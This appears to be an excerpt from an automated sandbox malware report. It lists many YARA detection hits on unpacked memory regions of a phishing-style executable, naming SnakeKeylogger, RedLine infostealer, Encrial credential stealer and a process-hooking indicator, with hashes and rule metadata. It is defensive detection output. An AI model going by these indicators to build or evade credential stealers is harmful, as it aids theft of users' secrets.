Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.Mxhvdwzh.PIF.215fa548.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.4da6c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.21686db8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.hzwdvhxM.pif.438038.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.Mxhvdwzh.PIF.2169cbd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.1.hzwdvhxM.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.1.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.hzwdvhxM.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.1.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.1.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.hzwdvhxM.pif.4da6c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.1.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
